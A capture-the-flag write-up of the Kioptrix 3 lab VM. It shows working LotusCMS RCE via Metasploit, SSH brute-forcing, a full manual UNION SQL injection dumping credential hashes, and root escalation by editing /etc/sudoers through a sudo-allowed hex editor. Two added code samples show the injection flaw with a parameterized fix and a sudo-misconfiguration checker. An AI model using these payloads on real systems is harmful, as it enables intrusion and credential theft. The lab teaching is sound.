
Kioptrix 3 writeup

Introduction

In this writeup I will continue Kioptrix series made by loneferret. Supposedly, there are multiple working exploits! How many can we find? Let’s see… Kioptrix 3 here I come!


Scanning and enumeration

Start a simple ARP scan with netdiscover to reveal target IP:

 root@EdgeOfNight:~# netdiscover

 Currently scanning: 192.168.46.0/16   |   Screen View: Unique Hosts                                                                                                                                              
                                                                                                                                                                                                                  
 12 Captured ARP Req/Rep packets, from 9 hosts.   Total size: 720                                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.11     [REDACTED]  	      2       120  Intel Corporate                                                                                                                                                
 192.168.1.15     08:00:27:08:00:ba   1        60  PCS Systemtechnik GmbH                                                                                                                                         
 192.168.1.12     [REDACTED]  	      1        60  Unknown vendor                                                                                                                                                 
 192.168.1.18     [REDACTED] 	      1        60  Apple, Inc.                                                                                                                                                    
 192.168.1.1      [REDACTED] 	      3       180  Unknown vendor                                                                                                                                           
 192.168.1.10     [REDACTED]          1        60  Unknown vendor                                                                                                                                                 
 192.168.1.20     [REDACTED]          1        60  Unknown vendor                                                                                                                                                 
 192.168.1.19     [REDACTED]          1        60  LG Innotek                                                                                                                                                     
 192.168.1.23     [REDACTED]          1        60  Unknown vendor     

Kioptrix3 has been assigned the IP 192.168.1.15. For the sake of simplicity I’ll add the IP to the /etc/hosts file for easier navigation later on. Do this with echo "192.168.1.15 kioptrix3.com" >> /etc/hosts. This allows us to reference the machine as kioptrix3.com instead of 192.168.1.15.

!!! Make sure you do not overwrite your hosts file by inputting only one “>” !!!

My next step is a simple nmap portscan to detect open ports & running services.

root@EdgeOfNight:~# nmap kioptrix3.com -A -T5 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-10-21 13:22 CDT
Nmap scan report for kioptrix3.com (192.168.1.15)
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 08:00:27:08:00:BA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms kioptrix3.com (192.168.1.15)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds

HTTP (80) and SSH (22) are both open. I wonder what the webpage looks like?

Cool. Clicking Login shows:

and clicking here redirects to a gallery:


Exploitation

Wait, really? Why was the recon so fast? No dirbuster, nikto, spidering? There are still many reconnaissance steps I could take; however, to keep my writeup short I’ll focus on (hopefully) two main exploitation paths: LotusCMS and the gallery.

- Shell: LotusCMS

Fortunately, I had already encountered the LotusCMS vulnerability once, so getting a reverse shell was easy. LotusCMS is seeded with various vulnerabilities such as an RCE and an LFI. More can be found by querying searchsploit:

root@EdgeOfNight:~# searchsploit LotusCMS
------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                     |  Path
                                                                   | (/usr/share/exploitdb/platforms/)
--------------------------------------------------------------------- --------------------------------
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)      | php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities                          | php/webapps/16982.txt
------------------------------------------------------------------- ----------------------------------

Look! A metasploit RCE module. I usually avoid metasploit modules (and you should too), however I’ll use it just once for simplicity. msfconsole -x "use exploit/multi/http/lcms_php_exec; set URI /; set RHOST kioptrix3.com;run" yields a www-data shell.

msfconsole -x combines all commands into one

After that, just list the /home/ directory, which shows two users, dreg and loneferret; fire up hydra and brute-force both of their SSH accounts! Users done. Sorry for not going into much detail when describing the steps! I find this way of getting a user rather stupid, which led to my quick explanation. If you despise using msfconsole, there is a tool on GitHub which can do the same thing.

Visit the previously mentioned webpage. Inside the Ligoat Press Room, the gallery allows sorting photos by ID, which possibly opens up an SQL injection attack.

Unfortunately, explaining the whole idea behind these injections would take ages. I recommend either SqlMap (see below) or learning manual injection before reading the rest. So, do you see the URL? Changing id=1 to id=' causes a query error.

Tadaa! SQL Injection is possible! Time to dump database contents for passwords & usernames :).

Start out with kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,2,3,4,5,6# to find out how many columns the original query selects, since a UNION only succeeds when both sides have the same column count (ORDER BY testing could be used as well).

Columns 2 and 3 are reflected on the page. Now we can substitute those numbers with SQL expressions like @@version or database() - kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,@@version,database(),4,5,6#:

Dump all tables within our database() output - kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,table_name,NULL,4,5,6 FROM information_schema.tables WHERE table_schema = 'gallery'#:

Knowing the table names, choose an interesting one and dump its columns - kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,column_name,NULL,4,5,6 FROM information_schema.columns WHERE table_name = 'dev_accounts'#:

Result shows us 3 columns of interest:

Great! That’s exactly what we want. All that remains is one last command which will present us with the sweet credentials - kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,CONCAT(username,';',id,';',password),NULL,4,5,6 FROM dev_accounts:

The CONCAT() function just joins all 3 column values into one string with a semicolon (;) as the delimiter. Ultimately, you can use SqlMap, which automates the attack.

root@EdgeOfNight:~# sqlmap -u kioptrix3.com/gallery/gallery.php?id=1 -T dev_accounts --dump

---CUT CUT CUT---

Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+

---CUT CUT CUT---
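To make clear why the six-column UNION above works and what actually stops it, here is an added example that is not the writeup's or LotusCMS's code: it rebuilds the bug class on an in-memory SQLite database, with a vulnerable lookup beside a fixed one. The photos table, its column names and the account values are constructed placeholders; only the six-column shape and the dev_accounts(id, username, password) layout follow the page.

```python
import sqlite3

# Constructed stand-in for the gallery database. The photo table name and
# the account values are placeholders; only the six-column shape and the
# dev_accounts(id, username, password) layout follow the writeup.
SCHEMA = """
CREATE TABLE photos(id INTEGER, title TEXT, filename TEXT,
                    c4 INTEGER, c5 INTEGER, c6 INTEGER);
INSERT INTO photos VALUES (1, 'Goat 1', 'goat1.jpg', 0, 0, 0);
CREATE TABLE dev_accounts(id INTEGER, username TEXT, password TEXT);
INSERT INTO dev_accounts VALUES (1, 'dreg', 'md5-placeholder-1');
INSERT INTO dev_accounts VALUES (2, 'loneferret', 'md5-placeholder-2');
"""

# The writeup's payload minus the trailing '#': MySQL treats '#' as a
# comment, SQLite does not, and nothing follows the id in this query anyway.
PAYLOAD = "1 UNION SELECT 1,username,password,4,5,6 FROM dev_accounts"


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def gallery_vulnerable(conn, user_id):
    # The bug class: the id from the URL is pasted into the SQL text, so a
    # UNION with a matching column count appends attacker-chosen rows and
    # the username/password land in columns 2 and 3, exactly as on the page.
    sql = "SELECT * FROM photos WHERE id=%s" % user_id
    return conn.execute(sql).fetchall()


def gallery_fixed(conn, user_id):
    # Defence 1: the id must be a plain integer or nothing is returned.
    if not str(user_id).isdigit():
        return []
    # Defence 2: the value is bound as data; it can never become SQL syntax.
    return conn.execute(
        "SELECT * FROM photos WHERE id=?", (int(user_id),)).fetchall()
```

With the vulnerable lookup the payload returns the photo row plus one row per dev_accounts entry; the fixed lookup returns an empty result for the same input.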

Both hashes being unsalted MD5s, I decide to crack them. You could use a tool like hashcat or John the Ripper, but I’ll stick to a simple online rainbow-table cracker.

Doing some experimenting I find out that the passwords can be used for SSH login. dreg has a limited shell and therefore loneferret’s account will be used instead.

Boom. Time for some privilege escalation!


Privilege escalation

Snooping around for some time, I discover that loneferret can run ht (a hex editor) via sudo.

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on the host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

sudo ht effectively allows us to edit any file on the system as root. There are many ways to escalate from such a misconfiguration (for example editing root’s public SSH keys, changing the passwd file or editing the sudoers file). I’ll do the third one. Before editing the sudoers file, make sure to export TERM so the editor’s text-mode interface works - loneferret@Kioptrix3:~$ export TERM=xterm. Once done, open up the ht editor.
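A defender reviewing a host for this class of misconfiguration can check it mechanically. The following is an added example, not code from the writeup: it parses sudo -l output in the format shown above and flags root grants for programs that can write arbitrary files. The EDITORS set is an assumption to extend for your own environment, and the sample text is constructed from the page's sudo -l listing.

```python
import re

# Constructed from the sudo -l output shown above; no other grants exist.
SUDO_L_OUTPUT = """\
User loneferret may run the following commands on the host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Assumed list of programs whose root execution implies arbitrary file
# writes (every entry is an editor; ht is the one granted on this box).
EDITORS = {"ht", "vi", "vim", "nano", "ed"}

# One "(runas) TAG: [!]command" line as printed by sudo -l.
ENTRY = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<neg>!?)(?P<cmd>\S.*?)\s*$")


def parse_sudo_l(text):
    """Return one dict per command line; the header line is skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        entries.append({
            "runas": m.group("runas").split(":")[0].strip(),
            "nopasswd": "NOPASSWD" in tags,
            "denied": m.group("neg") == "!",
            "command": m.group("cmd"),
        })
    return entries


def risky_entries(entries, editors=EDITORS):
    """Allowed root grants that hand out root-equivalent file access."""
    risky = []
    for e in entries:
        # A '!' entry only denies that exact path; sudoers(5) warns that
        # subtracting commands with '!' is trivially bypassed, so it adds
        # no protection and is simply skipped here.
        if e["denied"] or e["runas"] not in ("root", "ALL"):
            continue
        program = e["command"].split()[0].rsplit("/", 1)[-1]
        if e["command"] == "ALL" or program in editors:
            risky.append(e)
    return risky
```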

Press F3 to prompt an input window which asks us for a file to open - in our case /etc/sudoers.

Edit the file so that we can use sudo without limitations.

When done, sudo su root and the box is rooted! Go and get that root flag!


Conclusion

Fun box with a lot of small twists. I don’t think I found every vulnerability, but 2 is better than none! Compared to the other boxes in the series, this one was in my opinion the hardest. Enjoyed it nonetheless! If you have any questions, feel free to leave a comment down below or contact me.

~V3